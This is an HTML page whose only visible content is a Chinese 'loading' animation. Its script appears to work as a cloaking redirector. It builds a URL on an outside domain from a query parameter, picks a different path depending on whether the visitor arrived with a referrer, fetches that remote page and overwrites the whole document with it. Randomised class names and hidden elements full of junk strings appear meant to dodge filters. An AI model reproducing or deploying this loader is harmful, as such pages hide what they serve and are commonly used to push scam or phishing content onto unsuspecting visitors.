<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .FYFPQHFfvak {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .FYFPQHFfvak .dxa1c3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .FYFPQHFfvak .content {
            line-height: 50px;
            text-align: center
        }

        .FYFPQHFfvak .img {
            width: 100%
        }

        .FYFPQHFfvak .uIAZVB4C1v {
            text-align: center
        }

        .FYFPQHFfvak .uIAZVB4C1v span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .FYFPQHFfvak .uIAZVB4C1v span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .FYFPQHFfvak .uIAZVB4C1v span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .FYFPQHFfvak .uIAZVB4C1v span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .FYFPQHFfvak .uIAZVB4C1v span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .FYFPQHFfvak .uIAZVB4C1v span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .FYFPQHFfvak .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RYtl0qDpd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var UfkQf0 = RYtl0qDpd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ UfkQf0 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ UfkQf0 +".html?a=share";
		}
		
        e7aCzdT=url+"#"+new Date().getTime();
        e7aCzdT && function() {
            $.get(e7aCzdT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<span style='display:none'>kGYirYIIsMXsO3dwk8XTez2b3jVtvXspvju6OM5vHZQTvi3O9uCT6qK0</span>
<b style='display:none' >lmjZhRv0yq7cPg27AIncOEoUBrhKd4</b>
<span style='display:none'>kGYirYIIsMXsO3dwk8XTez2b3jVtvXspvju6OM5vHZQTvi3O9uCT6qK0</span>
<a  href='#' style='display:none'>LphP90AqaKQC82c81YxsJCmBeeldO39uFdhOwKXM9</a>
<p  style='display:none'>ExptfIPg3C4xrvsPc1q</p>
<b style='display:none' >lmjZhRv0yq7cPg27AIncOEoUBrhKd4</b><div class="FYFPQHFfvak">
    <div class="dxa1c3">
        <div class="uIAZVB4C1v">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >xxIudrCh9FjO15Y</ul>
<a  href='#' style='display:none'>CbB5SPtnAV404UcoZABeb</a>
<img  src='' style='display:none'>
<div style='display:none'>sdjPKW7Mprui3p3UjCXzEmVNkjAMXKBSYsVk5REj</div>
<b style='display:none' >EeLnp4JezcltsD2AdDj9UUfdxxUhxoV7YsmoIeOci0t5yVtAzvx91fJ6wwXxEAi6fJg2rNhsL8p1k</b>
<img  src='' style='display:none'>
<b style='display:none' >EeLnp4JezcltsD2AdDj9UUfdxxUhxoV7YsmoIeOci0t5yVtAzvx91fJ6wwXxEAi6fJg2rNhsL8p1k</b>
<span style='display:none'>GwS1qEUof9BNB4ntfHBLuBxPIBZMmu9kyJ6ELzHzAACp0lR0b</span></body>
</html>